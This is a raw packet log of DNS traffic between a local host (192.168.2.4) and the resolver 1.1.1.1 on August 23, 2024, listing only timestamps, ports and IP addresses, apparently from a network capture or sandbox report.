Aug 23, 2024 18:48:53.758476973 CEST	49668	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.758951902 CEST	52344	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.759141922 CEST	65272	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.759449005 CEST	65322	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.759738922 CEST	49274	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.759788036 CEST	63395	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.760514021 CEST	59338	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.761104107 CEST	51287	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.761614084 CEST	63463	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.762268066 CEST	51867	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.763292074 CEST	51415	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.763577938 CEST	60609	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.763676882 CEST	62974	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.764348030 CEST	50541	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.764434099 CEST	52311	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.765321016 CEST	53670	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.765388966 CEST	52716	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.765875101 CEST	52740	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.765924931 CEST	61644	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.766794920 CEST	54437	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.766910076 CEST	53690	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.767693043 CEST	55899	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.768063068 CEST	49630	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.768171072 CEST	61064	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.768688917 CEST	64795	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.769033909 CEST	65234	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.769515991 CEST	64982	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.769900084 CEST	60425	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.770373106 CEST	62415	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.770626068 CEST	60874	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.770828962 CEST	62498	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.771146059 CEST	64568	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.771593094 CEST	53	62248	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.771703959 CEST	57970	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.771891117 CEST	52425	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.772404909 CEST	50194	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.772578955 CEST	53	52234	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.772774935 CEST	52771	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.772932053 CEST	53	49668	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.773076057 CEST	53	65272	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.773116112 CEST	53	65322	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.773128033 CEST	53	52344	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.773459911 CEST	57543	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.775266886 CEST	53	51867	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.775693893 CEST	53	51287	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.775705099 CEST	53	59338	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.775729895 CEST	62408	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.775758982 CEST	53	63463	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.775892973 CEST	53	62974	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.777277946 CEST	53	50541	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.778017998 CEST	53	53670	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.778270006 CEST	53	60609	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.778422117 CEST	53	52311	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.778681040 CEST	53	61644	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.779480934 CEST	53	64795	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.780292988 CEST	53	49630	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.780782938 CEST	53	55899	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.781212091 CEST	53	54437	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.781416893 CEST	53	62415	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.781620026 CEST	53	64982	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.782687902 CEST	62382	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.782859087 CEST	53	62498	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.783181906 CEST	49912	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.783818960 CEST	60558	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.784163952 CEST	53	60874	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.784385920 CEST	62600	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.784600973 CEST	53	57970	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.784846067 CEST	64461	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.784909964 CEST	53995	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.785088062 CEST	53	57543	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.785295010 CEST	56573	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.785381079 CEST	53	52771	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.785396099 CEST	53	53690	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.785557985 CEST	55068	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.785604000 CEST	49643	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.785777092 CEST	60093	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.786372900 CEST	50997	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.786648035 CEST	56998	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.786694050 CEST	64001	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.786844969 CEST	64595	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.786983967 CEST	63279	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.787111998 CEST	64202	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.787249088 CEST	60646	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.787384033 CEST	57201	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:53.790179968 CEST	53	49885	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.790568113 CEST	53	54700	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.792018890 CEST	53	56024	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.793123007 CEST	53	59059	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.794126987 CEST	53	63395	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.794960022 CEST	53	62382	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.795774937 CEST	53	55302	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.802778959 CEST	53	53995	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.802820921 CEST	53	60558	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.802833080 CEST	53	51415	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.807554007 CEST	53	56573	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.810086966 CEST	53	50997	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.810199976 CEST	53	55068	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.810210943 CEST	53	64202	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.810410023 CEST	53	57201	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.810420990 CEST	53	52740	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.810431957 CEST	53	56998	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.811701059 CEST	53	49274	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.813455105 CEST	53	60425	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.815648079 CEST	53	52425	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.818249941 CEST	53	64568	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.831197023 CEST	53	49912	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.831792116 CEST	53	64461	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.831801891 CEST	53	49643	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.833870888 CEST	53	62600	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.833880901 CEST	53	60093	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.833889961 CEST	53	64001	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.834407091 CEST	53	63279	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.836999893 CEST	53	60646	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.837011099 CEST	53	64595	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.927089930 CEST	53	62849	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.928035975 CEST	53	61064	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.929987907 CEST	53	65234	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.938546896 CEST	53	50194	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.939928055 CEST	53	62408	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:53.987970114 CEST	53	52716	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:54.003997087 CEST	54832	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:54.209496021 CEST	53	54832	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.167090893 CEST	64701	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.167692900 CEST	59288	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.176821947 CEST	61517	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.177357912 CEST	62818	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.188448906 CEST	60117	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.189058065 CEST	65413	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.189369917 CEST	53	61517	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.190442085 CEST	53	62818	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.191123962 CEST	52086	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.192549944 CEST	65100	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.193335056 CEST	50879	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.193924904 CEST	62316	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.194302082 CEST	51447	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.194832087 CEST	58612	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.194956064 CEST	53443	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.195776939 CEST	60457	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.195835114 CEST	55131	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.195985079 CEST	54327	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.196552038 CEST	60256	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.196640015 CEST	56847	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.197176933 CEST	63242	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.197293997 CEST	59024	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.197848082 CEST	56726	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.197909117 CEST	54226	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.198523045 CEST	54301	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.199014902 CEST	61561	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.200529099 CEST	53	64701	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.202891111 CEST	53	52086	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.203022957 CEST	58611	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.203880072 CEST	53	60117	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.204050064 CEST	57283	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.204180002 CEST	53	62316	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.205034971 CEST	53	65100	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.206444979 CEST	53	51447	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.208493948 CEST	53	54327	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.208842993 CEST	53	56847	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.208853960 CEST	53	53443	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.208858967 CEST	62341	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.208864927 CEST	53	50879	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.209112883 CEST	59986	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.209151030 CEST	53	60457	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.209477901 CEST	56052	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.209649086 CEST	54844	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.209672928 CEST	53	63242	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.210199118 CEST	53	54226	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.210685015 CEST	53	56726	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.210834026 CEST	51946	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.211165905 CEST	63903	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.211252928 CEST	53	59024	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.211494923 CEST	55537	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.211730003 CEST	53	54301	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.212027073 CEST	53	60256	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.212141037 CEST	61235	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.212472916 CEST	52450	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.212673903 CEST	58636	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.213300943 CEST	56009	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.220673084 CEST	51209	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.220879078 CEST	59047	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.221239090 CEST	64543	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.221391916 CEST	55603	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.221779108 CEST	53	52450	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.222237110 CEST	53	62341	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.222925901 CEST	53	65413	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.222981930 CEST	53	56052	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.222991943 CEST	53	63903	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.223526001 CEST	53	58636	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.225121021 CEST	53	61235	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.229754925 CEST	53	55131	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.231272936 CEST	52812	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.231565952 CEST	53	59047	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.231724024 CEST	53	61561	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.232615948 CEST	53	55603	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.233234882 CEST	53	64543	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.235153913 CEST	53	58612	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.235862970 CEST	53	58611	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.237396002 CEST	53	57283	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.238279104 CEST	51264	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.238846064 CEST	49596	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.239262104 CEST	54760	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.240865946 CEST	62031	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.241347075 CEST	59365	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.242312908 CEST	61210	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.242774963 CEST	52592	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.243766069 CEST	53	54844	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.245002031 CEST	53	51946	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.246151924 CEST	50556	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.247128010 CEST	51773	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.247745991 CEST	52337	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.248130083 CEST	59052	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.249432087 CEST	54918	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.249454975 CEST	53	54760	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.249763966 CEST	53	59986	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.250950098 CEST	50069	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.251462936 CEST	65397	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.253140926 CEST	53940	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.253540993 CEST	53	59365	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.254193068 CEST	50510	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.254687071 CEST	53	52592	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.254757881 CEST	52653	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.255146027 CEST	56393	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.255467892 CEST	64299	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.256352901 CEST	51421	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.256737947 CEST	54698	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.257247925 CEST	62259	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.258543015 CEST	53	51209	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.258961916 CEST	53	50556	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.259830952 CEST	53	51773	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.259948969 CEST	53	59052	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.261449099 CEST	53	54918	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.263025045 CEST	53	50069	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.263602018 CEST	53	52812	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.263925076 CEST	53	65397	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.266612053 CEST	53	52653	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.266623020 CEST	53	56393	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.266632080 CEST	53	54698	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.267920017 CEST	53	51421	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.268471956 CEST	53	50510	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.269069910 CEST	53	62259	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.272841930 CEST	53	62031	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.275753021 CEST	53	49596	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.280313969 CEST	53	61210	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.288093090 CEST	53	64299	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.292982101 CEST	53	53940	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.340410948 CEST	53	59288	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.370682001 CEST	53	55537	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.371293068 CEST	53	56009	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.406666994 CEST	53	51264	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.420355082 CEST	53	52337	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.741251945 CEST	52832	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.742098093 CEST	63489	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.743108034 CEST	49457	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.743738890 CEST	63457	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.744199991 CEST	65140	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.744570017 CEST	58590	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.745035887 CEST	60987	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.745122910 CEST	65114	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.745649099 CEST	56746	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.746109009 CEST	53772	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.746295929 CEST	60810	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.746746063 CEST	62353	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.746923923 CEST	62543	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.747284889 CEST	54459	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.747801065 CEST	55591	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.747968912 CEST	53750	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.748317003 CEST	64626	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.748897076 CEST	64870	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.748970032 CEST	61506	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.749465942 CEST	49875	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.749582052 CEST	61487	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.750097036 CEST	58914	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.750538111 CEST	52394	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.750761032 CEST	61949	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.751210928 CEST	57504	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.751666069 CEST	51067	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.752047062 CEST	64002	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.752597094 CEST	64627	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.752736092 CEST	51442	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.753266096 CEST	52927	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.753266096 CEST	53999	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.753997087 CEST	51615	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.754148006 CEST	65290	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.754668951 CEST	57593	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.754940987 CEST	62475	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.755642891 CEST	56066	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.755712986 CEST	52623	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.756203890 CEST	58722	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.756644011 CEST	64120	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.756819963 CEST	53	52832	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.757245064 CEST	52546	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.757791996 CEST	52484	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.758251905 CEST	61730	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.758322001 CEST	53	63457	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.758464098 CEST	65121	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.758802891 CEST	62120	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.759840012 CEST	53	58590	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.760114908 CEST	50846	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.760230064 CEST	56016	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.760462999 CEST	53	60810	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.761198997 CEST	53	65140	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.761337996 CEST	53	65114	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.761459112 CEST	65137	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.761537075 CEST	63351	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.761653900 CEST	52998	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.761811018 CEST	59230	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.761919022 CEST	53130	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.762080908 CEST	59826	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.762274027 CEST	58698	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.762492895 CEST	58046	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.762578011 CEST	55811	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.762727976 CEST	56071	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.762768030 CEST	53	53772	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.762867928 CEST	53	62353	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.762939930 CEST	51188	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.763025045 CEST	54875	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.763081074 CEST	53	54459	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.763293028 CEST	53	53750	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.763315916 CEST	56897	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.763518095 CEST	57273	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.763880968 CEST	62152	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.764007092 CEST	60308	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.764090061 CEST	53	61487	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.764101028 CEST	53	55591	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.764111042 CEST	53	64870	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.764121056 CEST	53	61949	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.764122963 CEST	64604	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.764236927 CEST	53	58914	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.764341116 CEST	59924	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.764906883 CEST	53	57504	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.766196012 CEST	53	52394	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.766206026 CEST	53	64002	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.766216040 CEST	53	51067	1.1.1.1	192.168.2.4
